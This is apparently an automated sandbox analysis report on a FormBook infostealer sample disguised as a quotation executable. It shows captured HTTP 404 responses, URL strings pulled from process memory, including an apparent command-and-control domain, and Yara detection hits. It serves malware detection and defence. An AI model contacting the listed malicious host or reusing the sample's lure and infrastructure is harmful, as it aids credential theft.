Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:04:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:04:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:04:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Feb 2025 12:05:59 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Feb 2025 12:06:02 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hTADm3jqWMCPFzFLm4hEjCXvfuzSI6Elylesx7R957kMQCgVAoRSw0VVnimwlUd1RqB7lUDUhfP339JzMt%2B18h9xiwES1Q6eM1KP%2B%2B7X1yCyy%2FctIB9ftYwMwRJNs%2BKQ20E%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a6cf2d3d1a30-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mQgqdYCo9sNdV4rcLqwRtt9H8AVuNO%2F6lScKWhgSHmbt4iA2qXWzAwykbIpfCf5nmVAm5iyDrBCFI5B5WwqFB3HlmO%2FpTNX3nJ9%2FdqgEe6K2iWqy3PYvUASJ%2F0Kb9bZTOfZ2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a6defbc443f7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=768&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Bjh5PmZFzqjbqKIyDNB7eIZVq27SUFvMZd6Zzi8nhjwKK2Na%2Byh9%2FWRJQsc9kaVQ3g1dP5pcRiY2XSpFqxs%2BN0a10hw04Co6eSCP0%2F%2BVB3Um6TpR7B47k1zFGA1H1NTSS%2Bt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a6ef0b1c8ccd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1781&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQv%2BvmOooswOSdOvI2oR5F8R9gImb3JmOZsyDfjt9j8cCB02QIBe4cqks5Fs9%2BUBg13JRzfsjaILdR7sp%2BNOircqF%2FRrXwl4fC7QreQP9zuXgJkd5%2BJkyI8HFfCB8cdA7FYs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a6fecd7e7ce8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U70IHFUBvquqMceTLfyxYcaPX%2BlrzXz0L0uX%2FlwEevVo8U%2BwD52r0XwmHNz6mfSYMXUB9vDUW8YBUiibUNZRqSIWhZRvoCdEQbafwUBJCB76OWW96Pvh4rp2Vk22Ocwv7GZ2E7FJYO8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a723faf80cbe-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1488&min_rtt=1488&rtt_var=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=763&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 06 ba 70 31 64 23 0a 2e 74 e3 09 52 67 6c 02 69 52 62 04 7b 7b a9 1a 10 d7 2e 5d 0d fc ff fe 63 d0 e6 d1 eb ba 42 cb 86 34 66 97 3d eb ae ed e0 18 33 ec e2 2d 10 ca 57 88 f2 89 d4 15 f6 91 e6 e5 9e 39 64 4e 1a ad fa 5e 58 a5 51 be eb c5 9d 74 81 c3 e0 c2 5d aa 46 ad 9b f6 13 91 45 2a cb 43 2b 21 c0 c0 64 88 5c 18 20 47 20 77 35 bd 67 38 9c f6 5b 30 81 60 63 53 1c 19 2e c9 71 20 3f 03 a7 14 13 4c 66 60 10 e2 af f8 b5 e2 01 bc bc fa bf 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afA0Ea<@p1d#.tRgliRb{{.]cB4f=3-W9dN^XQt]FE*C+!d\ G w5g8[0`cS.q ?Lf`+0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kiiL2PQXcjnNjQv5q8MFNc9JpQhtJZhghge59C%2FfGl6dgv7XH3wNQYSal8WBWjzwpzECzu%2Bbdw%2BnCHWEyueUXGMa0zSMdUxX9mv05zWt9ROD%2FOOuOwON5mRLjtQ%2Bo5N%2BqpoWS9nwkAY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a73e6c698c7d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1799&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 06 ba 70 31 64 23 0a 2e 74 e3 09 52 67 6c 02 69 52 62 04 7b 7b a9 1a 10 d7 2e 5d 0d fc ff fe 63 d0 e6 d1 eb ba 42 cb 86 34 66 97 3d eb ae ed e0 18 33 ec e2 2d 10 ca 57 88 f2 89 d4 15 f6 91 e6 e5 9e 39 64 4e 1a ad fa 5e 58 a5 51 be eb c5 9d 74 81 c3 e0 c2 5d aa 46 ad 9b f6 13 91 45 2a cb 43 2b 21 c0 c0 64 88 5c 18 20 47 20 77 35 bd 67 38 9c f6 5b 30 81 60 63 53 1c 19 2e c9 71 20 3f 03 a7 14 13 4c 66 60 10 e2 af f8 b5 e2 01 bc bc fa bf 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afA0Ea<@p1d#.tRgliRb{{.]cB4f=3-W9dN^XQt]FE*C+!d\ G w5g8[0`cS.q ?Lf`+0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LGU8zGVgmqlFvlOZl0c6Mvp8D0TWB%2FTxowZJ0%2BaQL%2FEgz3JBJWp%2FfhX50M0kEeSrLqFXOX83gJtTAoNDfAsdrIIZvWQXrMPiFEPASBRxhG5KtwSXVR31wpk8GdGzvWVAMXm69hLXvGc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a74e8a701a1b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 06 ba 70 31 64 23 0a 2e 74 e3 09 52 67 6c 02 69 52 62 04 7b 7b a9 1a 10 d7 2e 5d 0d fc ff fe 63 d0 e6 d1 eb ba 42 cb 86 34 66 97 3d eb ae ed e0 18 33 ec e2 2d 10 ca 57 88 f2 89 d4 15 f6 91 e6 e5 9e 39 64 4e 1a ad fa 5e 58 a5 51 be eb c5 9d 74 81 c3 e0 c2 5d aa 46 ad 9b f6 13 91 45 2a cb 43 2b 21 c0 c0 64 88 5c 18 20 47 20 77 35 bd 67 38 9c f6 5b 30 81 60 63 53 1c 19 2e c9 71 20 3f 03 a7 14 13 4c 66 60 10 e2 af f8 b5 e2 01 bc bc fa bf 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: afA0Ea<@p1d#.tRgliRb{{.]cB4f=3-W9dN^XQt]FE*C+!d\ G w5g8[0`cS.q ?Lf`+0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:06:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgZF6ezM%2FBIc3v2vSIzIQJKn%2BTUGg2NSC39tl6yV8ufnjsRvdAzfoJHSkVQYsobGku1Rs56SvXJLqOrSC9fYxzmXI4Mp7PX28mm8mVrYxQdKYGi3vVoy5y0AQh4Q5ujZkgQWV%2BHQKlk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135a75e69258c83-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1799&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and

Source: QUOTATION NO REQ-19-000640.exe, 00000000.00000002.1282818282.0000000002817000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION NO REQ-19-000640.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000002.3751418671.0000000004DA0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lucynoel6465.shop
Source: KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000002.3751418671.0000000004DA0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lucynoel6465.shop/am6a/
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SearchIndexer.exe, 0000000F.00000002.3742460427.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: SearchIndexer.exe, 0000000F.00000002.3742460427.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SearchIndexer.exe, 0000000F.00000002.3742460427.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: SearchIndexer.exe, 0000000F.00000002.3742460427.0000000003106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: SearchIndexer.exe, 0000000F.00000002.3742460427.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SearchIndexer.exe, 0000000F.00000002.3742460427.0000000003106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: SearchIndexer.exe, 0000000F.00000003.1936670513.0000000007E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SearchIndexer.exe, 0000000F.00000002.3750231153.000000000440A000.00000004.10000000.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000002.3749558176.000000000317A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: SearchIndexer.exe, 0000000F.00000003.1941729834.0000000007E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3749397326.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3735374231.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
